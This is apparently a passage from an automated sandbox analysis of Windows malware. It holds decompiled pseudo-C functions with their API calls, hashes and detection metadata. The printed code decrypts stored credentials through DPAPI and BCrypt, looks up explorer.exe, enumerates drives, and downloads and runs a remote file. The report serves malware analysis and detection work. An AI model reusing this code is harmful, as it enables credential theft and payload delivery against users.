					_push(_t63);
					_push( &_v16);
					_push( &_v20);
					_t36 = E0040C1DD(_t75, _t73, __eflags);
					__eflags = _t36;
					if(_t36 != 0) {
						_t76 = E00401085(_v16 + 1);
						__eflags = _v16 + 1;
						E00401052(_t76, 0, _v16 + 1);
						E0040102C(_t76, _v20, _v16);
						_push(_v20);
						goto L10;
					}
				} else {
					_t36 = E00401000(__ecx,  &_v12, 3);
					_t77 = _t77 + 0xc;
					if(_t36 != 0) {
						goto L8;
					} else {
						if(_a4 != _t36 && _a8 != _t36) {
							_t61 = 0x40;
							E00401052( &_v88, _t36, _t61);
							_t7 = _t75 + 3; // 0x3
							_v88 = _t61;
							_v80 = _t7;
							_t10 = _t73 - 0x10; // -16
							_v84 = 1;
							_v76 = 0xc;
							_v64 = _t10 + _t75;
							_t14 = _t73 - 0x1f; // -31
							_t50 = _t14;
							_v60 = 0x10;
							_v16 = _t50;
							_t36 = LocalAlloc(_t61, _t50);
							_t74 = _t36;
							if(_t74 != 0) {
								_t54 = _v80 + _v76;
								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);
								if(_t54 != 0) {
									return 0x418fe6;
								}
								_t76 = E00401085(_v16 + 1);
								E00401052(_t76, 0, _v16 + 1);
								E0040102C(_t76, _t74, _v16);
								_push(_t74);
								L10:
								LocalFree();
								return _t76;
							}
						}
					}
				}
				return _t36;
			}























                                  0x0040c6bd
                                  0x0040c6c6
                                  0x0040c6c8
                                  0x0040c6ce
                                  0x0040c6d2
                                  0x0040c6d7
                                  0x0040c7b0
                                  0x0040c7b0
                                  0x0040c7b6
                                  0x0040c7bc
                                  0x0040c7c0
                                  0x0040c7c8
                                  0x0040c7ca
                                  0x0040c7da
                                  0x0040c7dc
                                  0x0040c7e1
                                  0x0040c7f0
                                  0x0040c7f8
                                  0x00000000
                                  0x0040c7f8
                                  0x0040c6dd
                                  0x0040c6e4
                                  0x0040c6e9
                                  0x0040c6ee
                                  0x00000000
                                  0x0040c6f4
                                  0x0040c6f7
                                  0x0040c708
                                  0x0040c70f
                                  0x0040c714
                                  0x0040c717
                                  0x0040c71a
                                  0x0040c720
                                  0x0040c723
                                  0x0040c72c
                                  0x0040c733
                                  0x0040c736
                                  0x0040c736
                                  0x0040c73b
                                  0x0040c742
                                  0x0040c745
                                  0x0040c74b
                                  0x0040c74f
                                  0x0040c76c
                                  0x0040c773
                                  0x0040c77b
                                  0x00000000
                                  0x0040c7a9
                                  0x0040c78b
                                  0x0040c791
                                  0x0040c79e
                                  0x0040c7a6
                                  0x0040c7fb
                                  0x0040c7fb
                                  0x00000000
                                  0x0040c801
                                  0x0040c74f
                                  0x0040c6f7
                                  0x0040c6ee
                                  0x0040c807

                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                  • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • LocalFree.KERNEL32(?), ref: 0040C7FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                  • String ID: 0$v1
                                  • API String ID: 4131498132-3331332043
                                  • Opcode ID: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction ID: 2970a0a6e6da2b46dc71b506d453e3d8838dace9638eca7dbf8707eb64b33263
                                  • Opcode Fuzzy Hash: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction Fuzzy Hash: 064160B2D00108BBDB01ABD5DC85EEFB7BCEF44344F14813BF911A2290E7389A458B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041405F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041405F(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E00401052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E00401176( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}








                                  0x00414079
                                  0x00414085
                                  0x0041408d
                                  0x0041409b
                                  0x004140c8
                                  0x004140b8
                                  0x00000000
                                  0x004140d9
                                  0x004140c2
                                  0x004140c2
                                  0x004140cd
                                  0x00000000

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041406E
                                  • Process32First.KERNEL32(00000000,?), ref: 0041409B
                                  • Process32Next.KERNEL32(00000000,?), ref: 004140C2
                                  • CloseHandle.KERNEL32(00000000), ref: 004140CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID: explorer.exe
                                  • API String ID: 420147892-3187896405
                                  • Opcode ID: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction ID: ea809b74c35a4b4e8447ab93d020d769017f33877584137915eab964d6a7a943
                                  • Opcode Fuzzy Hash: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction Fuzzy Hash: CB01A972505114ABD7209761EC09FDB77FCDF49310F1040B6FA45E21C0EA78DAD58A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D97, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 24%
                                  			E00409D97(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E004011C0(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}




















                                  0x00409d97
                                  0x00409d9f
                                  0x00409da7
                                  0x00409daa
                                  0x00409dac
                                  0x00409daf
                                  0x00409dbd
                                  0x00409dbf
                                  0x00409dc2
                                  0x00409dc4
                                  0x00409dc7
                                  0x00409dca
                                  0x00409dce
                                  0x00409dcf
                                  0x00409dc7
                                  0x00409dd3
                                  0x00409dd6
                                  0x00409dd9
                                  0x00409ddc
                                  0x00409de7
                                  0x00409deb
                                  0x00409df3
                                  0x00409e1c
                                  0x00409df5
                                  0x00409df7
                                  0x00409df9
                                  0x00409dfc
                                  0x00409e02
                                  0x00409e02
                                  0x00409e06
                                  0x00409e09
                                  0x00409e0c
                                  0x00409e0f
                                  0x00409e02
                                  0x00409e19
                                  0x00409e19
                                  0x00409e2c

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                  • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                  • String ID: Could not decrypt
                                  • API String ID: 3112367126-1484008118
                                  • Opcode ID: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction ID: aa4716c66a3a11094124d3c9fea6a44173f7715366435e59aa3e46d54874a9c7
                                  • Opcode Fuzzy Hash: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction Fuzzy Hash: 6E11C676904219ABC711CB99C8809EFF7BCEF88704B1045BBE955F7292E6359E01CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A8C, Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410A8C(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E00401052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E004036F7(_t37,  &_v580);
				return _t37;
			}












                                  0x00410a99
                                  0x00410aab
                                  0x00410ab0
                                  0x00410ab2
                                  0x00410ab5
                                  0x00410abb
                                  0x00410ac3
                                  0x00410ae9
                                  0x00410b10
                                  0x00410b10
                                  0x00410b19
                                  0x00410b1e
                                  0x00410b1e
                                  0x00410b2d
                                  0x00410b37

                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                  • LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                  • GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                  • FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                  • String ID:
                                  • API String ID: 1866703397-0
                                  • Opcode ID: a99fe88b912b9a90b46e4a78fd4ea3cd93b49c87cff4e41624bf92df729e9547
                                  • Instruction ID: 268544a994eea4337760f271e77acc5a4e560188a377bc451064b1715e62684d
                                  • Opcode Fuzzy Hash: a99fe88b912b9a90b46e4a78fd4ea3cd93b49c87cff4e41624bf92df729e9547
                                  • Instruction Fuzzy Hash: 0C11FE71A0020DABDB10DFD0DC89EEFB7BCEB08344F004476F205E2190D7749A849B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C3B9, Relevance: 6.0, APIs: 4, Instructions: 49encryptionmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040C3B9(intOrPtr __ecx, void** __edx, long* _a4) {
				intOrPtr _v8;
				void* _t6;
				void* _t8;
				long* _t9;
				void* _t13;
				void** _t14;
				void* _t16;
				void* _t17;

				_t9 = _a4;
				_t17 = 0;
				_v8 = __ecx;
				_t14 = __edx;
				 *_t9 = 0;
				 *((intOrPtr*)(__edx)) = 0;
				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
				if(__ecx != 0) {
					_t6 = LocalAlloc(0x40,  *_t9);
					 *_t14 = _t6;
					if(_t6 != 0) {
						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
						_t17 = _t6;
						if(_t17 == 0) {
							 *_t14 = LocalFree( *_t14);
						}
					}
				}
				return _t17;
			}











                                  0x0040c3be
                                  0x0040c3c5
                                  0x0040c3c7
                                  0x0040c3d0
                                  0x0040c3d2
                                  0x0040c3d6
                                  0x0040c3d8
                                  0x0040c3e0
                                  0x0040c3e6
                                  0x0040c3ec
                                  0x0040c3f0
                                  0x0040c3fc
                                  0x0040c402
                                  0x0040c406
                                  0x0040c410
                                  0x0040c410
                                  0x0040c406
                                  0x0040c3f0
                                  0x0040c418

                                  APIs
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                  • LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                  • LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction ID: 97c3cc2928edf4510a7e7d2c17aa5025b134dfc6b4fce315ddd3b78eefc3bfdb
                                  • Opcode Fuzzy Hash: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction Fuzzy Hash: A6011D71641231BFD7214B569C49EA7BFACEF497E0B108131F948E6290D7B18D00DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040290E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0040290E(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E00410C8A( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E004035B9( &_v16, _t59, __eflags);
				E00403447(E0040357C( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E00405FEB(_v16);
				_t61 = _a4 + 4;
				E0040373F( &_v16, _a4 + 4);
				E00403447( &_v12, _t66, E0040362F( &_v16,  &_a4));
				E00405FEB(_a4);
				_a4 = _a4 & 0x00000000;
				E00405FEB(_v16);
				_t36 = E0040373F( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E00405FEB(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x417810;
				E00405044(_t42,  &_v20);
				return E00405FEB(_v12);
			}












                                  0x0040290e
                                  0x00402917
                                  0x0040291e
                                  0x0040291f
                                  0x00402926
                                  0x0040292a
                                  0x00402941
                                  0x00402949
                                  0x00402954
                                  0x00402958
                                  0x0040296d
                                  0x00402975
                                  0x0040297d
                                  0x00402981
                                  0x0040298d
                                  0x0040299b
                                  0x004029a6
                                  0x004029ad
                                  0x004029c5
                                  0x004029cb
                                  0x004029d2
                                  0x004029d5
                                  0x004029d7
                                  0x004029d7
                                  0x004029af
                                  0x004029af
                                  0x004029af
                                  0x004029dd
                                  0x004029e7
                                  0x004029f8

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040362F: PathFindExtensionW.SHLWAPI(?), ref: 00403639
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040299B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004029C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                  • String ID: open
                                  • API String ID: 4166385161-2758837156
                                  • Opcode ID: d995fef18129c4f08e864c21fee30d5446cd9e6673a4ce1fd4005cf7ffc9c6cf
                                  • Instruction ID: 7d7fc589e9963d25af6e0cc8dd23fda473545fd51eb9e29652c6e1dbcd1770d4
                                  • Opcode Fuzzy Hash: d995fef18129c4f08e864c21fee30d5446cd9e6673a4ce1fd4005cf7ffc9c6cf
                                  • Instruction Fuzzy Hash: 18214F71A00108BBCB15AFA6C885EEE7B78EF84759F00406AF416772C1DB785645CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EDA9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EDA9(intOrPtr* __ecx, char __edx) {
				char _v12;
				long _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v52;
				void _v56;
				void* _t14;
				intOrPtr _t17;
				union _PROCESSINFOCLASS _t20;
				intOrPtr* _t29;
				intOrPtr _t31;

				_t29 = __ecx;
				_v12 = __edx;
				_t20 = 0;
				_t31 = 1;
				if( *__ecx != 1) {
					_t14 = GetCurrentProcess();
					_t31 =  *_t29;
				} else {
					_t14 =  *( *(__ecx + 4));
				}
				_v32 = _v12;
				_v28 = 0x426970;
				_v20 = _t29;
				if(_t31 == 1 && NtQueryInformationProcess(_t14, _t20,  &_v56, 0x18,  &_v16) >= 0 && _v16 == 0x18) {
					_t17 = _v52;
					if(_t17 != 0) {
						_t11 =  &_v24; // 0x40ec60
						_v24 = _t17;
						_t20 = E0040EE24( &_v32, _t11, 0x150);
					}
				}
				return _t20;
			}
















                                  0x0040edb2
                                  0x0040edb4
                                  0x0040edb9
                                  0x0040edbb
                                  0x0040edbe
                                  0x0040edc7
                                  0x0040edcd
                                  0x0040edc0
                                  0x0040edc3
                                  0x0040edc3
                                  0x0040edd2
                                  0x0040edd5
                                  0x0040eddc
                                  0x0040ede2
                                  0x0040ee00
                                  0x0040ee05
                                  0x0040ee0c
                                  0x0040ee0f
                                  0x0040ee1b
                                  0x0040ee1b
                                  0x0040ee05
                                  0x0040ee23

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000001,C0000135,0040EAD8,?,?,?,?,?,?,?,?,?,0040EC60,?,00000000,?), ref: 0040EDC7
                                  • NtQueryInformationProcess.NTDLL ref: 0040EDF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentInformationQuery
                                  • String ID: `@
                                  • API String ID: 3953534283-951712118
                                  • Opcode ID: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction ID: 3ac64283fd91789c4a21a164da3f73717bcde32abe73c1a33020f5e4c519176d
                                  • Opcode Fuzzy Hash: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction Fuzzy Hash: C0016171E00219AFDB04CF96D8848AFB7B9EB44351B10447AE511B7280D7745E54CFE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041154A, Relevance: 4.6, APIs: 3, Instructions: 90COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0041154A(intOrPtr __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				WCHAR* _t33;
				intOrPtr _t34;
				int _t44;
				WCHAR* _t54;
				signed int _t72;
				intOrPtr _t74;
				int _t75;
				long _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v12 = __ecx;
				_t33 = E00406099(0x208);
				_v32 = _v32 & 0x00000000;
				_t54 = _t33;
				_t34 = 5;
				_v28 = _t34;
				_v36 = _t34;
				E00401A48( &_v40, __eflags);
				_t76 = GetLogicalDriveStringsW(0x104, _t54);
				_t81 = _t76 - 0x104;
				if(_t76 > 0x104) {
					_t72 = 2;
					_t54 = E00406099( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
					GetLogicalDriveStringsW(_t76, _t54);
				}
				_t77 = 0;
				if( *_t54 != 0) {
					do {
						_v24 = _t77;
						E00403549( &_v24, E004036F7( &_v8, _t54));
						E00405FEB(_v8);
						_v8 = _t77;
						_t44 = GetDriveTypeW(_v24);
						_t79 = _t79 - 0xc;
						_t75 = _t44;
						_t78 = _t79;
						_v20 = _t75;
						E0040373F(_t78,  &_v24);
						 *(_t78 + 4) = _t75;
						 *((intOrPtr*)(_t78 + 8)) = _v16;
						E00401955( &_v40);
						_t54 =  &(( &(_t54[E00403373( &_v24)]))[1]);
						E00405FEB(_v24);
						_t77 = 0;
						_v24 = 0;
						_t84 =  *_t54;
					} while ( *_t54 != 0);
					_t74 = _v12;
				}
				E004013FA(_t74, _t84,  &_v40);
				_t60 = _v40;
				if(_v40 != 0) {
					E00401B52(_t60, _t60);
				}
				return _t74;
			}























                                  0x00411553
                                  0x0041155a
                                  0x0041155d
                                  0x00411562
                                  0x0041156b
                                  0x0041156d
                                  0x0041156e
                                  0x00411571
                                  0x00411574
                                  0x00411585
                                  0x00411587
                                  0x0041158d
                                  0x00411593
                                  0x004115a2
                                  0x004115a6
                                  0x004115a6
                                  0x004115ac
                                  0x004115b1
                                  0x004115b3
                                  0x004115b7
                                  0x004115c3
                                  0x004115cb
                                  0x004115d3
                                  0x004115d6
                                  0x004115dc
                                  0x004115df
                                  0x004115e1
                                  0x004115e3
                                  0x004115ec
                                  0x004115f7
                                  0x004115fa
                                  0x004115fd
                                  0x00411610
                                  0x00411613
                                  0x00411618
                                  0x0041161a
                                  0x0041161d
                                  0x0041161d
                                  0x00411622
                                  0x00411622
                                  0x0041162b
                                  0x00411630
                                  0x00411635
                                  0x00411638
                                  0x00411638
                                  0x00411643

                                  APIs
                                    • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,74A313FB,00000000,00405B72), ref: 0040609C
                                    • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                  • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0041157F
                                  • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004115A6
                                  • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004115D6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                  • String ID:
                                  • API String ID: 2408535517-0
                                  • Opcode ID: c0c5c8e7104723ce3d4df7f61cac7c8c28d5f35411cc5e1ac6e0b4cadadba7b3
                                  • Instruction ID: 005d507b96d77ad3cbaae5a347880d44af72ce3ccef8451c39d33109e0eb80f3
                                  • Opcode Fuzzy Hash: c0c5c8e7104723ce3d4df7f61cac7c8c28d5f35411cc5e1ac6e0b4cadadba7b3
                                  • Instruction Fuzzy Hash: 2F318471E00219ABCF14EFA5D5869EFB7B8EF44305F10007EE502B7291DB785E418BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A8C3, Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0040A8C3(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E004011C0(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E00401052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E00405FFA(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}














                                  0x0040a8c3
                                  0x0040a8cb
                                  0x0040a8dd
                                  0x0040a8e0
                                  0x0040a8f3
                                  0x0040a90e
                                  0x0040a91a
                                  0x0040a91d
                                  0x0040a923
                                  0x0040a92e
                                  0x0040a932
                                  0x0040a935
                                  0x0040a938
                                  0x0040a944
                                  0x0040a94d
                                  0x0040a959
                                  0x0040a965

                                  APIs
                                  • lstrlenA.KERNEL32(?,?,?,00000000,?,0040A1B0,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0040A8E0
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040A90E
                                    • Part of subcall function 00405FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040A95B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                  • String ID:
                                  • API String ID: 573875632-0
                                  • Opcode ID: a7fcee0eccf1bffdf81db819550e444e68a458b4b19a0c296c275230d11a1816
                                  • Instruction ID: 46e43b13d17251deba087c8a1c7344e77a636f034bd5f4a2403ed6c43e9bde0d
                                  • Opcode Fuzzy Hash: a7fcee0eccf1bffdf81db819550e444e68a458b4b19a0c296c275230d11a1816
                                  • Instruction Fuzzy Hash: D811D6B6D00209AFCB01DFA5D8848EEBBB8EF08344F1080BAF509A2251D7359A05CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C261, Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0040C261(intOrPtr __ecx, char __edx, intOrPtr _a20, void** _a24, long* _a28) {
				void* _v8;
				long _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _t16;
				void* _t18;
				long _t23;
				char* _t26;

				_v24 = __ecx;
				_v28 = __edx;
				_v20 = 0;
				_t16 =  &_v28;
				_v16 = 0;
				__imp__CryptUnprotectData(_t16, 0,  &_v20, 0, 0, _a20,  &_v12);
				_t26 = _t16;
				if(_t26 != 0) {
					_t23 = _v12;
					_t27 = _a28;
					 *_a28 = _t23;
					_t18 = LocalAlloc(0x40, _t23);
					 *_a24 = _t18;
					if(_t18 != 0) {
						E0040102C(_t18, _v8,  *_t27);
					}
					LocalFree(_v8);
				}
				return _t26;
			}













                                  0x0040c26c
                                  0x0040c275
                                  0x0040c27d
                                  0x0040c282
                                  0x0040c285
                                  0x0040c289
                                  0x0040c28f
                                  0x0040c293
                                  0x0040c295
                                  0x0040c298
                                  0x0040c29e
                                  0x0040c2a0
                                  0x0040c2a9
                                  0x0040c2ad
                                  0x0040c2b5
                                  0x0040c2ba
                                  0x0040c2c0
                                  0x0040c2c0
                                  0x0040c2cb

                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040C289
